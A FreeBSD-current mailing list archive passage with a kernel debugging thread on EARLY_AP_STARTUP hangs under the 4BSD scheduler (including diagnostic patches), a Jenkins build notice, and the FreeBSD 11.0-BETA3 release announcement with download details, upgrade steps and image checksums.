+0000 (UTC) (envelope-from jhb@freebsd.org) Received: from mailman.ysv.freebsd.org (mailman.ysv.freebsd.org [IPv6:2001:1900:2254:206a::50:5]) by mx1.freebsd.org (Postfix) with ESMTP id DC44718A9 for ; Sat, 30 Jul 2016 19:14:12 +0000 (UTC) (envelope-from jhb@freebsd.org) Received: by mailman.ysv.freebsd.org (Postfix) id DBABCBA98E7; Sat, 30 Jul 2016 19:14:12 +0000 (UTC) Delivered-To: current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id DB57DBA98E6 for ; Sat, 30 Jul 2016 19:14:12 +0000 (UTC) (envelope-from jhb@freebsd.org) Received: from bigwig.baldwin.cx (bigwig.baldwin.cx [IPv6:2001:470:1f11:75::1]) (using TLSv1 with cipher DHE-RSA-CAMELLIA256-SHA (256/256 bits)) (Client did not present a certificate) by mx1.freebsd.org (Postfix) with ESMTPS id B78D118A8 for ; Sat, 30 Jul 2016 19:14:12 +0000 (UTC) (envelope-from jhb@freebsd.org) Received: from ralph.baldwin.cx (c-73-231-226-104.hsd1.ca.comcast.net [73.231.226.104]) by bigwig.baldwin.cx (Postfix) with ESMTPSA id D286EB987; Sat, 30 Jul 2016 15:14:11 -0400 (EDT) From: John Baldwin To: gljennjohn@gmail.com Cc: current@freebsd.org Subject: Re: EARLY_AP_STARTUP hangs during boot Date: Sat, 30 Jul 2016 12:03:59 -0700 Message-ID: <8097239.52FCHCROUA@ralph.baldwin.cx> User-Agent: KMail/4.14.3 (FreeBSD/10.3-STABLE; KDE/4.14.3; amd64; ; ) In-Reply-To: <20160730094422.68e1b8db@ernst.home> References: <20160516122242.39249a54@ernst.home> <2732687.Cf9hD9SkSs@ralph.baldwin.cx> <20160730094422.68e1b8db@ernst.home> MIME-Version: 1.0 Content-Transfer-Encoding: 7Bit Content-Type: text/plain; charset="us-ascii" X-Greylist: Sender succeeded SMTP AUTH, not delayed by milter-greylist-4.2.7 (bigwig.baldwin.cx); Sat, 30 Jul 2016 15:14:11 -0400 (EDT) X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 Precedence: list List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Sat, 30 Jul 2016 19:14:13 -0000 On Saturday, July 30, 2016 09:44:22 AM Gary Jennejohn wrote: > On Fri, 29 Jul 2016 13:17:42 -0700 > John Baldwin wrote: > > > On Thursday, July 28, 2016 12:31:31 AM Gary Jennejohn wrote: > > > Well, now I know that ULE is a prerequiste for EARLY_AP_STARTUP! I > > > wasn't aware of that. I prefer BSD and that's the scheduler I did > > > the first tests with. > > > > > > But with the ULE scheduler the system comes up all the way. > > > > > > It would be nice if the BSD scheduler could also be modified to > > > work with EARLY_AP_STARTUP. > > > > I wasn't able to reproduce your hang with 4BSD, but I think I see a > > possible problem. Try this: > > > > diff --git a/sys/kern/sched_4bsd.c b/sys/kern/sched_4bsd.c > > index 7de56b6..d53331a 100644 > > --- a/sys/kern/sched_4bsd.c > > +++ b/sys/kern/sched_4bsd.c > > @@ -327,7 +327,6 @@ maybe_preempt(struct thread *td) > > * - The current thread has a higher (numerically lower) or > > * equivalent priority. Note that this prevents curthread from > > * trying to preempt to itself. > > - * - It is too early in the boot for context switches (cold is set). > > * - The current thread has an inhibitor set or is in the process of > > * exiting. In this case, the current thread is about to switch > > * out anyways, so there's no point in preempting. If we did, > > @@ -348,7 +347,7 @@ maybe_preempt(struct thread *td) > > ("maybe_preempt: trying to run inhibited thread")); > > pri = td->td_priority; > > cpri = ctd->td_priority; > > - if (panicstr != NULL || pri >= cpri || cold /* || dumping */ || > > + if (panicstr != NULL || pri >= cpri /* || dumping */ || > > TD_IS_INHIBITED(ctd)) > > return (0); > > #ifndef FULL_PREEMPTION > > @@ -1127,7 +1126,7 @@ forward_wakeup(int cpunum) > > if ((!forward_wakeup_enabled) || > > (forward_wakeup_use_mask == 0 && forward_wakeup_use_loop == 0)) > > return (0); > > - if (!smp_started || cold || panicstr) > > + if (!smp_started || panicstr) > > return (0); > > > > forward_wakeups_requested++; > > > > Thanks, but with this patch the kernel hangs in exactly the same > place as before - after the HPET output. > > Maybe I'm missing some kernel option which ULE works around, or > something like that. Hmm, ok. Please add KTR_RUNQ and KTR_SMP to the KTR masks, that is 'options KTR_COMPILE=(KTR_PROC|KTR_RUNQ|KTR_SMP)' and 'options KTR_MASK=(KTR_PROC|KTR_RUNQ|KTR_SMP)' Please also add this patch (on top of the previous patch): diff --git a/sys/kern/sched_4bsd.c b/sys/kern/sched_4bsd.c index 2973a23..bab2278 100644 --- a/sys/kern/sched_4bsd.c +++ b/sys/kern/sched_4bsd.c @@ -1278,6 +1278,8 @@ sched_add(struct thread *td, int flags) KASSERT(td->td_flags & TDF_INMEM, ("sched_add: thread swapped out")); + CTR2(KTR_PROC, "sched_add: thread %d (%s)", td->td_tid, + sched_tdname(td)); KTR_STATE2(KTR_SCHED, "thread", sched_tdname(td), "runq add", "prio:%d", td->td_priority, KTR_ATTR_LINKED, sched_tdname(curthread)); diff --git a/sys/x86/x86/cpu_machdep.c b/sys/x86/x86/cpu_machdep.c index f07b97e..1f418f1 100644 --- a/sys/x86/x86/cpu_machdep.c +++ b/sys/x86/x86/cpu_machdep.c @@ -440,6 +440,7 @@ cpu_idle_wakeup(int cpu) return (0); if (*state == STATE_MWAIT) *state = STATE_RUNNING; + CTR1(KTR_PROC, "cpu_idle_wakeup: wokeup CPU %d", cpu); return (1); } (I haven't tried compiling it, you might have to add the sys/ktr.h header to cpu_machdep.c if it doesn't build.) Hopefully we will get some better trace messages before it hangs with this added info. The root issue seems to be that 4BSD is pinning thread0 to some other CPU (due to sched_bind that happens inside of bus_bind_intr() when the HPET driver pins IRQs to CPUs) and that other CPU isn't waking up to realize it needs to run thread0. -- John Baldwin From owner-freebsd-current@freebsd.org Sat Jul 30 21:11:40 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id 856F1BA92F7 for ; Sat, 30 Jul 2016 21:11:40 +0000 (UTC) (envelope-from jenkins-admin@FreeBSD.org) Received: from jenkins-9.freebsd.org (jenkins-9.freebsd.org [8.8.178.209]) by mx1.freebsd.org (Postfix) with ESMTP id 77D631DD7; Sat, 30 Jul 2016 21:11:40 +0000 (UTC) (envelope-from jenkins-admin@FreeBSD.org) Received: from jenkins-9.freebsd.org (localhost [127.0.0.1]) by jenkins-9.freebsd.org (Postfix) with ESMTP id 9BE161BD; Sat, 30 Jul 2016 21:11:40 +0000 (UTC) Date: Sat, 30 Jul 2016 21:11:40 +0000 (GMT) From: jenkins-admin@FreeBSD.org To: jenkins-admin@FreeBSD.org, freebsd-current@FreeBSD.org Message-ID: <228045260.73.1469913100361.JavaMail.jenkins@jenkins-9.freebsd.org> In-Reply-To: <1787258567.71.1469891535055.JavaMail.jenkins@jenkins-9.freebsd.org> References: <1787258567.71.1469891535055.JavaMail.jenkins@jenkins-9.freebsd.org> Subject: Jenkins build is still unstable: FreeBSD_HEAD #507 MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 7bit X-Instance-Identity: MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAkKKb2VAfYQKfu1t7qk4nR5qzUBEI+UqT4BPec4qHVhqUy0FFdq50sMH+3y9bCDNOufctov6VqTNffZ3YXArnZK95YF0OX97fh+E9txYOUX1adc+TikcKjuYpHmL5dE62eaZTI+4A5jnRonskQ1PaoIFz0Kbu4mWzkFsmdiXTraGzomXq4cHUCATA2+K4eDYgjXEQI30z3GOMmmZ4t/+6QGk1cMb/BqMWHbn80AsRCb4tU7Hpd72XLDpsuO7YRP1Q0CjmNAuBOTj+sFiiOe6U9HpqOlQN+iFUvBdZo/ybuy5Kh71cAaYQNL68cYdZJ6binH/DkG3KY/fS7DFYAeuwjwIDAQAB X-Jenkins-Job: FreeBSD_HEAD X-Jenkins-Result: UNSTABLE X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 Precedence: list List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Sat, 30 Jul 2016 21:11:40 -0000 See From owner-freebsd-current@freebsd.org Sat Jul 30 21:29:56 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id CD1A9BA96AD; Sat, 30 Jul 2016 21:29:56 +0000 (UTC) (envelope-from gjb@FreeBSD.org) Received: from freefall.freebsd.org (freefall.freebsd.org [IPv6:2001:1900:2254:206c::16:87]) by mx1.freebsd.org (Postfix) with ESMTP id B021D14DE; Sat, 30 Jul 2016 21:29:56 +0000 (UTC) (envelope-from gjb@FreeBSD.org) Received: from FreeBSD.org (freefall.freebsd.org [IPv6:2001:1900:2254:206c::16:87]) by freefall.freebsd.org (Postfix) with ESMTP id 668431259; Sat, 30 Jul 2016 21:29:56 +0000 (UTC) (envelope-from gjb@FreeBSD.org) Date: Sat, 30 Jul 2016 21:29:55 +0000 From: Glen Barber To: freebsd-current@FreeBSD.org, freebsd-stable@FreeBSD.org Cc: FreeBSD Release Engineering Team Subject: FreeBSD 11.0-BETA3 Now Available Message-ID: <20160730212955.GA90821@FreeBSD.org> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii; x-action=pgp-signed X-Operating-System: FreeBSD 11.0-CURRENT amd64 X-SCUD-Definition: Sudden Completely Unexpected Dataloss X-SULE-Definition: Sudden Unexpected Learning Event X-PEKBAC-Definition: Problem Exists, Keyboard Between Admin/Computer User-Agent: Mutt/1.5.24 (2015-08-30) X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 Precedence: list List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Sat, 30 Jul 2016 21:29:56 -0000 -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 The third BETA build of the 11.0-RELEASE release cycle is now available. Installation images are available for: o 11.0-BETA3 amd64 GENERIC o 11.0-BETA3 i386 GENERIC o 11.0-BETA3 powerpc GENERIC o 11.0-BETA3 powerpc64 GENERIC64 o 11.0-BETA3 sparc64 GENERIC o 11.0-BETA3 armv6 BANANAPI o 11.0-BETA3 armv6 BEAGLEBONE o 11.0-BETA3 armv6 CUBIEBOARD o 11.0-BETA3 armv6 CUBIEBOARD2 o 11.0-BETA3 armv6 CUBOX-HUMMINGBOARD o 11.0-BETA3 armv6 GUMSTIX o 11.0-BETA3 armv6 RPI-B o 11.0-BETA3 armv6 RPI2 o 11.0-BETA3 armv6 PANDABOARD o 11.0-BETA3 armv6 WANDBOARD o 11.0-BETA3 aarch64 GENERIC Note regarding arm/armv6 images: For convenience for those without console access to the system, a freebsd user with a password of freebsd is available by default for ssh(1) access. Additionally, the root user password is set to root, which it is strongly recommended to change the password for both users after gaining access to the system. Installer images and memory stick images are available here: ftp://ftp.freebsd.org/pub/FreeBSD/releases/ISO-IMAGES/11.0/ The image checksums follow at the end of this e-mail. If you notice problems you can report them through the Bugzilla PR system or on the -stable mailing list. If you would like to use SVN to do a source based update of an existing system, use the "stable/11" branch. A summary of changes since BETA2 includes: o Improvements to libunwind o Updates to locales o Increase the vt(4) framebuffer maximum size o bsdinstall(8) updates to prompt for the date and time during install, as well as prompting to enable various system hardening tuning options o Various other updates and fixes A list of changes since 10.0-RELEASE are available on the stable/11 release notes: https://www.freebsd.org/relnotes/11-STABLE/relnotes/article.html Please note, the release notes page is not yet complete, and will be updated on an ongoing basis as the 11.0-RELEASE cycle progresses. === Virtual Machine Disk Images === VM disk images are available for the amd64 and i386 architectures. Disk images may be downloaded from the following URL (or any of the FreeBSD FTP mirrors): ftp://ftp.freebsd.org/pub/FreeBSD/releases/VM-IMAGES/11.0-BETA3/ The partition layout is: ~ 16 kB - freebsd-boot GPT partition type (bootfs GPT label) ~ 1 GB - freebsd-swap GPT partition type (swapfs GPT label) ~ 20 GB - freebsd-ufs GPT partition type (rootfs GPT label) The disk images are available in QCOW2, VHD, VMDK, and raw disk image formats. The image download size is approximately 135 MB and 165 MB respectively (amd64/i386), decompressing to a 21 GB sparse image. Note regarding arm64/aarch64 virtual machine images: a modified QEMU EFI loader file is needed for qemu-system-aarch64 to be able to boot the virtual machine images. See this page for more information: https://wiki.freebsd.org/arm64/QEMU To boot the VM image, run: % qemu-system-aarch64 -m 4096M -cpu cortex-a57 -M virt \ -bios QEMU_EFI.fd -serial telnet::4444,server -nographic \ -drive if=none,file=VMDISK,id=hd0 \ -device virtio-blk-device,drive=hd0 \ -device virtio-net-device,netdev=net0 \ -netdev user,id=net0 Be sure to replace "VMDISK" with the path to the virtual machine image. === Amazon EC2 AMI Images === FreeBSD/amd64 EC2 AMIs are available in the following regions: us-east-1 region: ami-a648dfb1 us-west-1 region: ami-59511139 us-west-2 region: ami-35df1155 sa-east-1 region: ami-b6b027da eu-west-1 region: ami-13caa660 eu-central-1 region: ami-4a916625 ap-northeast-1 region: ami-fe35f09f ap-northeast-2 region: ami-1a06cc74 ap-southeast-1 region: ami-7520ff16 ap-southeast-2 region: ami-301f2a53 === Vagrant Images === FreeBSD/amd64 images are available on the Hashicorp Atlas site, and can be installed by running: % vagrant init freebsd/FreeBSD-11.0-BETA3 % vagrant up === Upgrading === The freebsd-update(8) utility supports binary upgrades of amd64 and i386 systems running earlier FreeBSD releases. Systems running earlier FreeBSD releases can upgrade as follows: # freebsd-update upgrade -r 11.0-BETA3 During this process, freebsd-update(8) may ask the user to help by merging some configuration files or by confirming that the automatically performed merging was done correctly. # freebsd-update install The system must be rebooted with the newly installed kernel before continuing. # shutdown -r now After rebooting, freebsd-update needs to be run again to install the new userland components: # freebsd-update install It is recommended to rebuild and install all applications if possible, especially if upgrading from an earlier FreeBSD release, for example, FreeBSD 9.x. Alternatively, the user can install misc/compat9x and other compatibility libraries, afterwards the system must be rebooted into the new userland: # shutdown -r now Finally, after rebooting, freebsd-update needs to be run again to remove stale files: # freebsd-update install == ISO CHECKSUMS == o 11.0-BETA3 amd64 GENERIC: SHA512 (FreeBSD-11.0-BETA3-amd64-bootonly.iso) = 1ed6ec2ef09a3d2ac0821dd636533a9a5642273c1b84d34e82643f41d9fca15ea7987da694c28c8b0aac2bfd70653f130601b843d618dfe4d405a3dc887a4599 SHA512 (FreeBSD-11.0-BETA3-amd64-bootonly.iso.xz) = 3fa4ee729380ab62bde999bf58d612754d72ef9aa8d4aa25cdb21fb1794a04ad3016e7337cba8e760e3bbefceba7b1f0f621f80b22c376324bd80a02a1bdda14 SHA512 (FreeBSD-11.0-BETA3-amd64-disc1.iso) = 25febc801e40d02014ac1fc2c2328d2adfc688200f2682c36d4d42f0df251348dcc5bd53ef157809802d4ae2e424233f4617c730474d6fedd619518987112a27 SHA512 (FreeBSD-11.0-BETA3-amd64-disc1.iso.xz) = 1de326c7ca4e96243a1d773a8c058498fbbbb49b509ff7dd0b82bf499fdf776379128d67ed60335dcf542e522a44d0479adebbb412faa01146d5c5f72c1d6b22 SHA512 (FreeBSD-11.0-BETA3-amd64-dvd1.iso) = 7e46946d800ceea6b22ae4703f952bb111ccec8a1ee987450cd0b11d38f729a83c26bfdd00675146e68bb0382b19b3fe70273c14b5fa964fe5d41010bf6eaec4 SHA512 (FreeBSD-11.0-BETA3-amd64-dvd1.iso.xz) = 4d15d39b31934fcbb8648313a5666e8fe8066f94642c6bd81d45ac2448efec8920a8bc91273401229d1d000dbf7ae872f97c8b8ed02664d2a9094bded9c890ca SHA512 (FreeBSD-11.0-BETA3-amd64-memstick.img) = b82360d6b64a708f012b9ac4ec4ca09258d58b6df293ac2abded798074be6ab7594160e22196eabaa342406b3d492e368df740618a1b9d083c7b89b453244b59 SHA512 (FreeBSD-11.0-BETA3-amd64-memstick.img.xz) = 72df9cb02d6ea2a0ac48e93754ff2c333e2d8f8713caf823ae527c52bf3224fd0031e9d91a448ef6b0715a90f625d57f02d738bb17fa6023914eea903690172e SHA512 (FreeBSD-11.0-BETA3-amd64-mini-memstick.img) = 25e190b2538ebf67730a105e26d949a45eae354e85cdd7ba1ad32779321e601f5781ce7f2ebe4dc8c2e482c7649d9f83309c1fcd6440daa850bcef27707dae1b SHA512 (FreeBSD-11.0-BETA3-amd64-mini-memstick.img.xz) = d4902e5056560b30c2e8a92306079e7f8e3e81a156c0774ad79b5beef076bde79ca3fc649514a37797f6d4e13a6d32bdec8d36d1ab748b1fd5501b1c605f1f0f SHA256 (FreeBSD-11.0-BETA3-amd64-bootonly.iso) = 7c1616919db50772d03bb38872881f90a54823a3d99da4442828bd1015c76134 SHA256 (FreeBSD-11.0-BETA3-amd64-bootonly.iso.xz) = 2e11c892a27aaea11a084058d69831369cbc5147c5db7322a176c6f1bf95f06f SHA256 (FreeBSD-11.0-BETA3-amd64-disc1.iso) = ba006b3ed7e0a875156977e25c19fc389c3fc3f42df62e6129f7a097d1011cdd SHA256 (FreeBSD-11.0-BETA3-amd64-disc1.iso.xz) = 56dd4476579f2e9625ae8bd091d0513468e9d395c000f629308296eef9732c08 SHA256 (FreeBSD-11.0-BETA3-amd64-dvd1.iso) = 987d389afd6477bee3db3cb4f380e463726280084bb2fa6e04112525c0747808 SHA256 (FreeBSD-11.0-BETA3-amd64-dvd1.iso.xz) = 6e3e8f23197e49a9902abb73a606492f9161dcf881c4c2d072420803f1b1b766 SHA256 (FreeBSD-11.0-BETA3-amd64-memstick.img) = 0eea88bb6362e30ac86d920a1ceb47a9789e9ac8080df49f19bb1c91c3538343 SHA256 (FreeBSD-11.0-BETA3-amd64-memstick.img.xz) = aed3d18012c5d56dec4ec0a5238f42f6af969aa701c9627bb2d541115f876f30 SHA256 (FreeBSD-11.0-BETA3-amd64-mini-memstick.img) = a8c5a32e8334aa4fa2f5dc3dcf075d0112c81ba8c0895c79660749e0a4906044 SHA256 (FreeBSD-11.0-BETA3-amd64-mini-memstick.img.xz) = 7872bac5af8de3b1850bbfa66f6e9400bdf5869d6af3ae3ef6a0357bd11c01e1 o 11.0-BETA3 i386 GENERIC: SHA512 (FreeBSD-11.0-BETA3-i386-bootonly.iso) = a7f644750c4ec4ddb749e7127afdf13ce1dd049cb7a906ee64d9758ff287d48966de4aacbcf41ffcfb565d7e29b636fe14b87dfc1135023c8a782a5d9da92cbc SHA512 (FreeBSD-11.0-BETA3-i386-bootonly.iso.xz) = e94f31bd3d6e974678a5bd41ef530f9a29b9a382c5a6cf15cb40d57f9dfaeda3c6de3209ce8e7ea4e53e905723ece8180a02a72b3965c3dc4304c4851bafd7de SHA512 (FreeBSD-11.0-BETA3-i386-disc1.iso) = 4cc14bd17522ce2e4656ad7693f7d8d6db150ff88e16ae6f896b45ded7594d97f8f95cf7cdfda76e795d45eb9a9f740a87fa4421693ce9bac719565d16d5c7a7 SHA512 (FreeBSD-11.0-BETA3-i386-disc1.iso.xz) = 09b2bd7c13e628a900b0be733c00dac3b71b616e4ccf3f7aa2275d663a2ba3b12229a53511791e4b2318895668e401e5b508074c0e5b2056d6980d2bdbfb80df SHA512 (FreeBSD-11.0-BETA3-i386-dvd1.iso) = 5ee26f49edf7957a11e758687199d9931d2878b8f17132c06ca6fe87871a51f676e37f58a8b42965182a81400a5e7acae1cb4f05d321fc2ed51dd3c1819f8197 SHA512 (FreeBSD-11.0-BETA3-i386-dvd1.iso.xz) = f6e067ea9793587b484240b859fd2bf5bfdcf495edea1ed71e04cb99d3f5727d84dd0b7124bfe3978639e6e7d225804dde2ec84b0866ede17844f08e3ca154e5 SHA512 (FreeBSD-11.0-BETA3-i386-memstick.img) = 1ac197c2b6b154cae91a2d74f702fbb7cc1122761c18dc046aede3e59b6924de90b495cb748d89ea3e2de76c021329b02d047c9b87a41c4c23f427e98d19af52 SHA512 (FreeBSD-11.0-BETA3-i386-memstick.img.xz) = 8456ee8e11def30f3d0d0efc4b31224752360f9dbae376782293a1ba46e9465ef6bbb72ddcfa293e7f4ecedc8a6db0cd9fd9596ceded0da89155d69d11ee0ba1 SHA512 (FreeBSD-11.0-BETA3-i386-mini-memstick.img) = 7c7af6585f3339dd3805ad7fbb9b70f3c6ab58e28e0d2cc4cf0ee34d66e6d87da28fcc44f77ac79aaba0a9de1e6345318d9fc9ef9b7601d1b5166916c555ea1e SHA512 (FreeBSD-11.0-BETA3-i386-mini-memstick.img.xz) = c9f7f8b4a5847ed2b9c6488f743a8c73be48126f0121f4bdf4ab5baee58255946ec87b0508358b571b43e43bdd7f24eb56defd32deb6cfbd2a1446bd2320f10a SHA256 (FreeBSD-11.0-BETA3-i386-bootonly.iso) = 73c01e1b6f9c9ef497c244a0e2a7635490ecffdcdec43d3b6989aa0212a3c427 SHA256 (FreeBSD-11.0-BETA3-i386-bootonly.iso.xz) = 92342a3953751e81f145dd94e45c99fdf6adb85bbe9e1427c81d1762660e86e4 SHA256 (FreeBSD-11.0-BETA3-i386-disc1.iso) = 835243ba1c08d7520c7e89170d245b83ed1db9d0bc92fdc59d9e9a803f2f2079 SHA256 (FreeBSD-11.0-BETA3-i386-disc1.iso.xz) = 9aab7a20b956051868838d785c6daa6d3fb505c56ae44d65f62e630e85b75c28 SHA256 (FreeBSD-11.0-BETA3-i386-dvd1.iso) = 2a5598f8e6c8dc832038436741f21c20fecd9bfff4d663bab0d1bb4e77526b25 SHA256 (FreeBSD-11.0-BETA3-i386-dvd1.iso.xz) = 47ae4c5f4262b427eab2daa698369aa78f06f31d7d48145937389010da473d02 SHA256 (FreeBSD-11.0-BETA3-i386-memstick.img) = 4d57b0a7c1674df1e2b7fb6881cf49c2bd6c9b036d11c45e725a3d635e5e1599 SHA256 (FreeBSD-11.0-BETA3-i386-memstick.img.xz) = 29d1e4538c35241e5e8ba3e26bfc9c5c25ca89ce7b47b70e088e3b5f7fe4f473 SHA256 (FreeBSD-11.0-BETA3-i386-mini-memstick.img) = 131e60dac369aaa7d0511ea83ab80921def1b6d3ef278f2fb1724d51199f8fa4 SHA256 (FreeBSD-11.0-BETA3-i386-mini-memstick.img.xz) = 041142a0c3d0636a308b374f046cf1c7333cee355011d3bbb6a07479cb8ee6bc o 11.0-BETA3 powerpc GENERIC: SHA512 (FreeBSD-11.0-BETA3-powerpc-bootonly.iso) = 469928f3ebaa5a813ee4972f071da3c355abdffcd93fda061486b848265125ce4022db0561f4b1fce4411fe104c2ad85b436dfe0f3370c841e761dcf1cfbec75 SHA512 (FreeBSD-11.0-BETA3-powerpc-bootonly.iso.xz) = 1b9961d6ec262484b3dc4a01654e6e509338b8f34daf6517ea2e544d35ce94c445e8c061a345873375f82e15b59d715bbfa41f0d3d1a8a8f8ba076606612e1c3 SHA512 (FreeBSD-11.0-BETA3-powerpc-disc1.iso) = 093b3793438aee6de993142b1c286473c94b844810951d2499aa226ccb5fdad889acb58108ae4f32fefa5767203d72359c55aa33b19a37a3d47f569019e6b883 SHA512 (FreeBSD-11.0-BETA3-powerpc-disc1.iso.xz) = 2287fcfb50e76288ae1f243262d6e0537fa1443126c9fc9b6d3ee2d93efe54f3fc1643a2eaa00662f84b496132a49071ec8538b4711e4b6f29f3086ae1de0660 SHA512 (FreeBSD-11.0-BETA3-powerpc-memstick.img) = 2969562daa6a1ec8d10f887058f783b1cbc76b6f161e2268a8d4184cc0e78aaa26224aa5e300984f015ff3952a8f4e524392a4453bd94eb2daea17fec2cfb157 SHA512 (FreeBSD-11.0-BETA3-powerpc-memstick.img.xz) = 70f0741aa3a91bad646b1d8b2e8adc5db9c81ae1d7c6a2fad41eec0d266fbbcca16d15a4d393e921b33398a306f3c5cbdaaa8d87adc436855814379a038e46c0 SHA512 (FreeBSD-11.0-BETA3-powerpc-mini-memstick.img) = 7ffc216fd6953ade1c265ab5af0feea21cb5581ec0fbc22b31e3b2deb534ebd69888a3d6a4f9886063aa1d7f3e67f6aa2a9c59e08251ba1c88cca53f7aec6015 SHA512 (FreeBSD-11.0-BETA3-powerpc-mini-memstick.img.xz) = db0fe74c5eaf1b3219caaf97a09eec701862cdd0b9f9e40e64f1f859d40b4ad642e33b0cea5a418a375454e818cb338b352ecdf7696d1f70cf768772ebafdb83 SHA256 (FreeBSD-11.0-BETA3-powerpc-bootonly.iso) = 8d9b3e91c10ea99d7309620db306db47e4a07885e146be6a00e81a45fc5e6ee4 SHA256 (FreeBSD-11.0-BETA3-powerpc-bootonly.iso.xz) = 7960fac3b887b5dbae67ac717c10f809f0705b7887268455173425c200994274 SHA256 (FreeBSD-11.0-BETA3-powerpc-disc1.iso) = 523a5997dd66b070a557d8bc6038f7cbc1c7a5dec9a82e868319554de1e61ec8 SHA256 (FreeBSD-11.0-BETA3-powerpc-disc1.iso.xz) = a60e1247e5e60187e61a3a3edd37b2c56953e2c596c4823a120bb2f7db6f4ec5 SHA256 (FreeBSD-11.0-BETA3-powerpc-memstick.img) = a8dc8789ede3704dd50b2dbea92b23969d27fd4b34320f67c593ebfbb1524008 SHA256 (FreeBSD-11.0-BETA3-powerpc-memstick.img.xz) = 5d1a7e244357777eae86d4222914728ba74778bc3aa6aafa7e45dfb2af259e52 SHA256 (FreeBSD-11.0-BETA3-powerpc-mini-memstick.img) = fc0ddccbbde536ef794b82b3f8205cd6b601f23ec458d794cbb118386ee0410d SHA256 (FreeBSD-11.0-BETA3-powerpc-mini-memstick.img.xz) = 566916fa2cafc57ab762ad9d50c5150ceaca546fd28b83f14e7e409f7da79d41 o 11.0-BETA3 powerpc64 GENERIC64: SHA512 (FreeBSD-11.0-BETA3-powerpc-powerpc64-bootonly.iso) = d2c317ff94b746935353caeab0314ff21a925eea9ddbcf5a2587c7b81c8a34934e80efc57d14d6309193dc852428e318d5eb98d6296c23852bfe02afdf99909c SHA512 (FreeBSD-11.0-BETA3-powerpc-powerpc64-bootonly.iso.xz) = d3473ce7772556e6d3c38760c43201949b2115879fd63354a1783a0198cf35ad2d0dbbc7e1247cdf9ee54e944f536eed71519b2eb7767eacd4d2dc58acf7d61b SHA512 (FreeBSD-11.0-BETA3-powerpc-powerpc64-disc1.iso) = 590a39dd19d61b7c10f7f54470f75347c02dc428f4164f24bc397ee103340a2377baf3160befe9ea6ae8d0c9a3630d6d81c051561ccca03e48ecee1d4249de1d SHA512 (FreeBSD-11.0-BETA3-powerpc-powerpc64-disc1.iso.xz) = 575cfcdec7eb4bbce0bc96f0fd5259faa77fb6723ababf9ce5f5624c85987c545fe74ac98e87e420eab5e048a9a3a878602d3ff755cacf1ab23361d625434ff4 SHA512 (FreeBSD-11.0-BETA3-powerpc-powerpc64-memstick.img) = 27725782dc4fee2e2972b619d8fc79c5668f2d9a1c9d98f0cca532683a4f88042ba7ea69178c699d0602ea8ce776daa1ba36a24c5b73515e11a2fd43c53029a7 SHA512 (FreeBSD-11.0-BETA3-powerpc-powerpc64-memstick.img.xz) = 6c3999bcfde9629e79253883ad648a484901e2752258f10d2a5a621b33e17edbc0ef2628cfa73311b78d9cb3719204602545b702121c766c1026114f4d56c50a SHA512 (FreeBSD-11.0-BETA3-powerpc-powerpc64-mini-memstick.img) = 910da35cb2c3a1a06756dfb0df153fd31a6c89efa5c884e9d9ea3bbb81d87fc2eaf6d2f12beaa07d86f8a4239160fcb08fa25f418dca5ec71f9f55fc4377ee83 SHA512 (FreeBSD-11.0-BETA3-powerpc-powerpc64-mini-memstick.img.xz) = 76011a173723b899171c7ff88bc24e7ec1b9c19a2311d16ebc4b6bdfdf242f3c54074d47e8fa2998900a4f1b58ba7ee741aab86a8d29ee0b982103957036b0b7 SHA256 (FreeBSD-11.0-BETA3-powerpc-powerpc64-bootonly.iso) = 90e337c8261a75a4cbb1f1c4fe6fc58abc24be0a9c99a41ae7d5f28f3908223d SHA256 (FreeBSD-11.0-BETA3-powerpc-powerpc64-bootonly.iso.xz) = 8d51398a1bab16ad5ac1e2a6a87541a2391cd69e32838a1534cc9ad834a9f042 SHA256 (FreeBSD-11.0-BETA3-powerpc-powerpc64-disc1.iso) = eb5b41524ee7b89b027dfcdcc1441c840fcf0a86d0f909075eb3e46ce4dae5b0 SHA256 (FreeBSD-11.0-BETA3-powerpc-powerpc64-disc1.iso.xz) = 887911d3c07b3268de7b1baaf71b7fb422f2882c8ceb61a36ea37a49f4b2c7fb SHA256 (FreeBSD-11.0-BETA3-powerpc-powerpc64-memstick.img) = d06be0c8e47744b1046621a318b88d29044479fb7815c306462e8cb760217fb8 SHA256 (FreeBSD-11.0-BETA3-powerpc-powerpc64-memstick.img.xz) = 383cb73568dabfa993ad80e3da1898d5e538de6294516e4c5c1758372d26fff9 SHA256 (FreeBSD-11.0-BETA3-powerpc-powerpc64-mini-memstick.img) = 55bb4e499d4cd6e5578a18e5d1abc656e8db4e001fcecccec7296624367e443d SHA256 (FreeBSD-11.0-BETA3-powerpc-powerpc64-mini-memstick.img.xz) = ba301a0d834c9b0adcef70eb142249f03d157d98f20e76069f8e57bc6ca3259b o 11.0-BETA3 sparc64 GENERIC: SHA512 (FreeBSD-11.0-BETA3-sparc64-bootonly.iso) = 7f24fa66925c66097d73c1731bf5d0e4e5a9bd348852bb8eb93ad1300f562ee80eb27093067fd1c3555b50546d368d4a43057d19771d38e0c70e4388c3f59728 SHA512 (FreeBSD-11.0-BETA3-sparc64-bootonly.iso.xz) = 